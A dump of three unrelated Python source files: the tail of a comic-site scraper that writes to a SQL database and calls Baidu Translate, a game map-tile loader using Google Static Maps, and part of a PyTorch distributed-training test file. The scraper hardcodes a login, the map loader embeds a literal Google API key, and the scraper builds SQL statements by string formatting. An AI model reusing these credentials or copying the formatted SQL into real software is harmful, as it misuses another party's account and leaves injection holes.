"VALUES ('{0}', '{1}', '{2}', '{3}', '{4}', '{5}', {6}, {7}, {8}, {9}, '{10}', '{11}', '{12}', '{13}', '{14}', '{15}', '{16}', {17}, {18}); " \
.format(book.id, book.title, book.title2, book.author, book.chineseTeam, book.description, book.epsCount, book.pages, int(book.finished), book.likesCount,
book.categories, book.tags, book.created_at, book.updated_at, book.path, book.fileServer, book.originalName, book.totalLikes, book.totalViews)
sql = sql.replace("\0", "")
# day = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
fileName = time.strftime('%Y-%m-%d', time.localtime(time.time()))
SubVersion = int(time.time())
# sql2 = "replace INTO system(id, size, time, subversion) VALUES('{0}', {1}, '{2}', {3})".format(
# config.UpdateVersion, len(self.books), day, SubVersion
# )
try:
self.cur.execute(sql)
# self.cur.execute(sql2)
data = base64.b64encode(sql.encode("utf-8")).decode("utf-8")
info = base64.b64encode(pickle.dumps(book)).decode("utf-8")
with open("data/"+fileName+".data", "a") as f:
f.write(info + "\r\n")
with open("version.txt", "w") as f2:
f2.write(str(SubVersion))
except Exception as es:
Log.Error(es)
return
# def LoadNextPage(self, page, maxPage):
# if page >= maxPage:
# return maxPage
# print("load page: " + str(page) + "/" + str(maxPage))
# task = Server().Send(req.AdvancedSearchReq(page, [], "dd"), isASync=False)
# if hasattr(task.res, "raw"):
# return self.SendSearchBack(page, task.res.raw.text)
# return page + 1
def LoadNextPage2(self, categoryIndex, page, maxPage):
if page > maxPage or page >= self.checkPage:
categoryIndex += 1
if categoryIndex >= len(self.idToCateGoryBase):
Log.Info("end")
return categoryIndex, page+1, maxPage
else:
page = 1
maxPage = 1
title = self.idToCateGoryBase[categoryIndex]
Log.Info("load page {}: ".format(title) + str(page) + "/" + str(maxPage) + " " + str(categoryIndex) + "/" + str(len(self.idToCateGoryBase)))
task = Server().Send(req.CategoriesSearchReq(page, title, "dd"), isASync=False)
if hasattr(task.res, "raw"):
page, maxPage = self.SendSearchBack(page, maxPage, task.res.raw.text)
return categoryIndex, page+1, maxPage
def SendSearchBack(self, page, maxPage, raw):
try:
data = json.loads(raw)
if data.get("code") == 200:
info = data.get("data").get("comics")
page = int(info.get("page"))
pages = int(info.get("pages"))
for v in info.get("docs", []):
a = DbBook()
a.id = v.get('_id')
a.title = v.get('title', "").replace("'", " ").replace("\"", " ")
a.author = v.get('author', "").replace("'", " ").replace("\"", " ")
a.chineseTeam = v.get('chineseTeam', "").replace("'", " ").replace("\"", " ")
a.description = v.get('description', "").replace("'", " ").replace("\"", " ")
a.finished = v.get('finished')
a.categories = v.get('categories', [])
a.tags = v.get('tags', [])
a.likesCount = v.get('likesCount', 0)
a.created_at = v.get('created_at', "")
a.updated_at = v.get('updated_at', "")
a.path = v.get('thumb', {}).get("path")
a.fileServer = v.get('thumb', {}).get("fileServer")
a.originalName = v.get('thumb', {}).get("originalName", "").replace("'", " ").replace("\"", " ")
a.pages = v.get('pagesCount', 0)
a.epsCount = v.get('epsCount', 0)
# self.books[a.id] = a
# self.AddHistory(a)
self._needUpIds.add(a.id)
return page + 1, pages
else:
return page + 1, maxPage
except Exception as es:
return page + 1, maxPage
# def LoadRandomNextPage(self):
# task = Server().Send(req.GetRandomReq(), isASync=False)
# if hasattr(task.res, "raw"):
# return self.SendRandomBack(task.res.raw.text)
# return
#
# def SendRandomBack(self, raw):
# try:
# data = json.loads(raw)
# if data.get("code") == 200:
# for v in data.get("data").get('comics', []):
# if v.get("_id") in self.books:
# continue
# a = Book()
# a.id = v.get('_id')
# a.title = v.get('title', "").replace("'", "\"").replace("/"", " " ")
# a.author = v.get('author', "").replace("'", "\"").replace("/"", " " ")
# a.chineseTeam = v.get('chineseTeam', "").replace("'", "\"").replace("/"", " " ")
# a.description = v.get('description', "").replace("'", "\"").replace("/"", " " ")
# a.finished = v.get('finished')
# a.categories = v.get('categories', [])
# a.tags = v.get('tags', [])
# a.likesCount = v.get('likesCount', 0)
# a.created_at = v.get('created_at', "")
# a.updated_at = v.get('updated_at', "")
# a.path = v.get('thumb', {}).get("path")
# a.fileServer = v.get('thumb', {}).get("fileServer")
# a.originalName = v.get('thumb', {}).get("originalName").replace("/"", " " ")
# a.pages = v.get('pagesCount', 0)
# a.epsCount = v.get('epsCount', 0)
# self.books[a.id] = a
# # self.AddHistory(a)
# self._resultQueue.put(a.id)
# return
# else:
# return
# except Exception as es:
# return
def OpenBookBack(self, raw):
try:
data = json.loads(raw)
if data.get("code") == 200:
if data.get("data").get("comic"):
info = data['data']['comic']
bookInfo = DbBook()
bookInfo.id = info.get("_id")
bookInfo.description = Converter('zh-hans').convert(info.get("description", "")).replace("'", "\"")
bookInfo.created_at = info.get("created_at")
bookInfo.updated_at = info.get("updated_at")
bookInfo.chineseTeam = Converter('zh-hans').convert(info.get("chineseTeam", "")).replace("'", "\"")
bookInfo.author = Converter('zh-hans').convert(info.get("author", "")).replace("'", "\"")
bookInfo.finished = info.get("finished")
bookInfo.likesCount = info.get("likesCount")
bookInfo.pages = info.get("pagesCount")
bookInfo.title = Converter('zh-hans').convert(info.get("title", "")).replace("'", "\"")
bookInfo.epsCount = info.get("epsCount")
bookInfo.tags = info.get("tags", [])
if bookInfo.tags:
bookInfo.tags = Converter('zh-hans').convert(",".join(bookInfo.tags))
bookInfo.categories = info.get("categories", [])
if bookInfo.categories:
bookInfo.categories = Converter('zh-hans').convert(",".join(bookInfo.categories))
bookInfo.path = info.get("thumb", {}).get("path", "")
bookInfo.fileServer = info.get("thumb", {}).get("fileServer", "")
bookInfo.originalName = info.get("thumb", {}).get("originalName", "").replace("'", "\"")
bookInfo.totalLikes = info.get("totalLikes")
bookInfo.totalViews = info.get("totalViews")
self._updateIds[bookInfo.id] = bookInfo
self._resultQueue.put(bookInfo.id)
except Exception as es:
Log.Error(es)
def Run(self):
page = 1
maxPage = 1
categoryIndex = 1
while categoryIndex < len(self.idToCateGoryBase):
categoryIndex, page, maxPage = self.LoadNextPage2(categoryIndex, page, maxPage)
Log.Info("start updating books, len:{}".format(len(self._needUpIds)))
for bookId in self._needUpIds:
task = Server().Send(req.GetComicsBookReq(bookId), isASync=False)
if hasattr(task.res, "raw"):
self.OpenBookBack(task.res.raw.text)
self._resultQueue.put(0)
return
# def Run2(self):
# count = 10000
# while count >= 0:
# count -= 1
# self.LoadRandomNextPage()
# time.sleep(1)
def Main(self):
while True:
try:
task = self._resultQueue.get(True)
except Exception as es:
continue
pass
self._resultQueue.task_done()
try:
if not self.RunMain(task):
break
except Exception as es:
Log.Error(es)
pass
return
def RunMain(self, task):
bookId = task
if bookId == 0:
Log.Info("end, exit")
return False
book = self._updateIds.get(bookId)
assert isinstance(book, DbBook)
if bookId in self.books:
oldBooks = self.books.get(bookId)
if book.updated_at == oldBooks.updated_at:
return True
else:
oldBooks.updated_at = book.updated_at
oldBooks.path = book.path
oldBooks.finished = book.finished
oldBooks.categories = book.categories
oldBooks.author = book.author
oldBooks.chineseTeam = book.chineseTeam
oldBooks.title = book.title
oldBooks.description = book.description
oldBooks.tags = book.tags
oldBooks.fileServer = book.fileServer
oldBooks.originalName = book.originalName
oldBooks.epsCount = book.epsCount
oldBooks.pages = book.pages
oldBooks.likesCount = book.likesCount
oldBooks.totalViews = book.totalViews
oldBooks.totalLikes = book.totalLikes
print("update BookId {}".format(bookId))
else:
if not self.BaiduFanyi(bookId):
return True
self.books[bookId] = book
oldBooks = book
print("add new BookId {}".format(bookId))
self.count += 1
self._updateIds.pop(bookId)
self.AddHistory(oldBooks)
# print("count "+str(self.count)+"/"+str(len(self.books)))
# if self.count % 100 == 0:
self.cur.execute("COMMIT")
return True
def BaiduFanyi(self, taskId):
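# Translate the book title with the Baidu Fanyi HTTP API. As the code below shows,
# the request is authenticated by signing MD5(appid + query + salt + secret key);
# on failure the book id is put back on the result queue so it can be retried.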
book = self._updateIds.get(taskId)
salt = randint(32768, 65536)
q = book.title
sign = self.appid + q + str(salt) + self.secretKey
sign = md5(sign.encode()).hexdigest()
myurl = self.url + '?appid=' + self.appid + '&q=' + parse.quote(q) + '&from=' + self.fromLang + '&to=' + self.toLang + '&salt=' + str(
salt) + '&sign=' + sign
try:
data = requests.get(myurl)
result = json.loads(data.text)
string = ''
for word in result['trans_result']:
if word == result['trans_result'][-1]:
string += word['dst']
else:
string += word['dst'] + '\n'
book.title2 = string
time.sleep(0.1)
return True
except Exception as Ex:
Log.Error(Ex)
self._resultQueue.put(taskId)
return False
if __name__ == "__main__":
config.LogIndex = 1
Log.Init()
Log.UpdateLoggingLevel()
config.HttpProxy = "http://127.0.0.1:10809"
config.CanWaifu2x = False
data = Server().Send(req.LoginReq("tonquer2", "tonquer2"), isASync=False)
Server().token = data.res.data.get("token")
data2 = Server().Send(req.CategoryReq(), isASync=False)
a = MainInfo()
for info in data2.res.data.get("categories", {}):
if info.get("isWeb"):
continue
a.idToCateGoryBase.append(info.get("title"))
# time.sleep(12)
a.thread.start()
a.Main()
print("exit")
pass
|
MapLoader.py
|
from io import BytesIO
from PIL import Image
from urllib import request
import os
from pathlib import Path
import time
import threading
from SimpleGUICS2Pygame import simpleguics2pygame
from Classes.Middle.SpriteControl.SpriteAnimator import SpriteAnimator
from Classes.Base.Vector import Vector
from Classes.Super.MapTile import MapTile
from Classes.Functions.Geometry import getMetersPerPixelGoogleImage,getMetersPerPixelsCam,getLatLongFromCoordinates
import matplotlib.pyplot as plt # this is if you want to plot the map using pyplot
import math
class MapLoader():
def __init__(self,zoom):
self.zoom=zoom
self.delay=2
self.currentTime=time.time()
self.tile_dict={}
self.cwd=os.getcwd()
self.loadingKeys={}
def updateTime(self):
self.delay-=time.time()-self.currentTime
def update(self,baseNode,cam,sprite_dict):
if self.delay<=0:
self.generatePoints(cam,sprite_dict,baseNode)
self.delay=2
else:
self.updateTime()
self.currentTime=time.time()
def generatePoints(self,cam,sprite_dict,baseNode):
self.updateZoomDistance(cam,baseNode)
mpp=512 # tile image size in pixels; scaled just below to the tile's extent in metres
scaleFactor=self.getImageScaleFactor(self.zoom, getLatLongFromCoordinates(baseNode,cam.origin)[0])
mpp*=scaleFactor
key_dict={}
remove_dict={}
for x in range(int((cam.origin.getX()-cam.dim.getX())//mpp),int(((cam.origin.getX()+cam.dim.getX())//mpp)+1)):
for y in range(int((cam.origin.getY()-cam.dim.getY())//mpp),int(((cam.origin.getY()+cam.dim.getY())//mpp)+1)):
key=self.constructKey(x,y,self.zoom)
directory=self.cwd+'/img/Map/'+key+'.png'
if not key in sprite_dict:
point = getLatLongFromCoordinates(baseNode, Vector(x * mpp, y * mpp))
url = self.getUrl(point[0], point[1], self.zoom)
path=Path(directory)
image=0
if path.is_file():
image=simpleguics2pygame._load_local_image(directory)
elif not key in self.loadingKeys:
imgThread=threading.Thread(target=self.loadImage,args=(url,directory))
imgThread.start()
self.loadingKeys.update({key:key})
# if the tile image is cached on disk it was loaded above via simpleguics2pygame;
# otherwise a background thread downloads it from the URL and saves it to disk
if image != 0:
tile = SpriteAnimator(image, scaleFactor)
radius=256*scaleFactor
sprite_dict.update({key: tile})
mapTile = MapTile(Vector(x*mpp,y*mpp),self.zoom,key,sprite_dict,radius)
self.tile_dict.update({key: mapTile})
elif key not in self.tile_dict:
radius = 256 * scaleFactor
mapTile = MapTile(Vector(x * mpp, y * mpp), self.zoom, key, sprite_dict,radius)
self.tile_dict.update({key:mapTile})
key_dict.update({key:key})
for key in self.tile_dict:
if key not in key_dict:
remove_dict.update({key:key})
for key in remove_dict:
self.tile_dict.pop(key)
def loadImage(self,url,directory):
with request.urlopen(url) as uRL:
f = BytesIO(uRL.read())
img = Image.open(f)
img.save(directory)
def draw(self,canvas,cam):
a=0
for key in self.tile_dict:
a+=1
tile=self.tile_dict[key]
tile.draw(canvas,cam)
def updateZoomDistance(self,cam,baseNode):
zoom=20
for i in range(0,19):
j=20-i
if getMetersPerPixelGoogleImage(getLatLongFromCoordinates(baseNode,cam.origin)[0],j)>getMetersPerPixelsCam(cam):
break
else:
zoom=j
self.zoom=zoom-1
def constructKey(self,lat,long,zoom):
# join with separators so that e.g. (1, 23) and (12, 3) produce distinct keys
key="{0}_{1}_{2}".format(lat,long,zoom)
return key
def getUrl(self,lat,long,zoom):
lat=round(lat,6)
long=round(long,6)
lat=str(lat)
long=str(long)
zoom=str(zoom)
p1='http://maps.googleapis.com/maps/api/staticmap?center='
p1= p1+lat+','+long+'&size=512x512&zoom='+zoom+'&format=png&maptype=roadmap&style=element:geometry%7Ccolor:0xebe3cd&style=element:labels.text.fill%7Ccolor:0x523735&style=element:labels.text.stroke%7Ccolor:0xf5f1e6&style=feature:administrative%7Celement:geometry.stroke%7Ccolor:0xc9b2a6&style=feature:administrative.land_parcel%7Celement:geometry.stroke%7Ccolor:0xdcd2be&style=feature:administrative.land_parcel%7Celement:labels%7Cvisibility:off&style=feature:administrative.land_parcel%7Celement:labels.text.fill%7Ccolor:0xae9e90&style=feature:landscape.natural%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:poi%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:poi%7Celement:labels%7Cvisibility:off&style=feature:poi%7Celement:labels.text%7Ccolor:0x6b4e00%7Cvisibility:on&style=feature:poi%7Celement:labels.text.fill%7Ccolor:0x93817c%7Cvisibility:off&style=feature:poi.park%7Celement:geometry.fill%7Ccolor:0xa5b076&style=feature:poi.park%7Celement:labels.text.fill%7Ccolor:0x447530&style=feature:road%7Celement:geometry%7Ccolor:0xf5f1e6&style=feature:road.arterial%7Cvisibility:off&style=feature:road.arterial%7Celement:geometry%7Ccolor:0xfdfcf8&style=feature:road.highway%7Celement:geometry%7Ccolor:0xf8c967&style=feature:road.highway%7Celement:geometry.stroke%7Ccolor:0xe9bc62&style=feature:road.highway%7Celement:labels%7Cvisibility:off&style=feature:road.highway.controlled_access%7Celement:geometry%7Ccolor:0xe98d58&style=feature:road.highway.controlled_access%7Celement:geometry.stroke%7Ccolor:0xdb8555&style=feature:road.local%7Cvisibility:off&style=feature:road.local%7Celement:labels%7Cvisibility:off&style=feature:road.local%7Celement:labels.text.fill%7Ccolor:0x806b63&style=feature:transit.line%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:transit.line%7Celement:geometry.fill%7Ccolor:0x000000%7Csaturation:-100%7Clightness:-100%7Cweight:0.5&style=feature:transit.line%7Celement:labels.text%7Cvisibility:on&style=feature:transit.line%7Celement:labels.text.fill%7Ccolor:0x8f7d77&style=feature:transit.line%7Celement:labels.text.stroke%7Ccolor:0xebe3cd&style=feature:transit.station%7Celement:geometry%7Ccolor:0xdfd2ae&style=feature:transit.station.rail%7Celement:geometry.fill%7Csaturation:-100&style=feature:water%7Celement:geometry.fill%7Ccolor:0xb9d3c2&style=feature:water%7Celement:labels.text.fill%7Ccolor:0x92998d&'+'sensor=false'
p1=p1+'&key=AIzaSyCPw8pNEVEb7g3jQPj2w4EeaTidz-4qJ-E'
return p1
def getImageScaleFactor(self,zoom,lat):
m2=getMetersPerPixelGoogleImage(lat,zoom)
return m2
|
test_c10d_common.py
|
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_TSAN,
)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multi-GPU tests are designed to simulate multiple nodes with multiple
GPUs on each node. The NCCL backend requires an equal number of GPUs in
each process. On a single node, all visible GPUs are evenly divided into
subsets, and each process uses only its own subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
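# For example, with 4 visible GPUs and world_size=2, gpus_for_rank(2) returns
# [[0, 1], [2, 3]]: rank 0 uses GPUs 0 and 1, rank 1 uses GPUs 2 and 3.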
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# The DistributedDataParallel tests don't seem to call the FileStore destructor.
# TODO: investigate; these tests are known to have issues.
# Use this workaround to remove the files left behind by those tests.
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
        for p in model.parameters():
            self.assertEqual(p.grad, expected_grad)
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
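        # This hook ignores the real gradients: it resolves the bucket with a tensor
        # of ones, and fut_then below adds another tensor of ones, so after backward()
        # every parameter gradient should be a tensor filled with 2s.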
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
# TSAN is not fork-safe since we're forking in a multi-threaded environment
if not TEST_WITH_TSAN:
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
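    # dist._compute_bucket_assignment_by_size groups gradient tensors into buckets
    # without mixing dtypes and caps each bucket's byte size at the given limit(s);
    # it returns the tensor indices per bucket and the size limit applied to each bucket.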
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
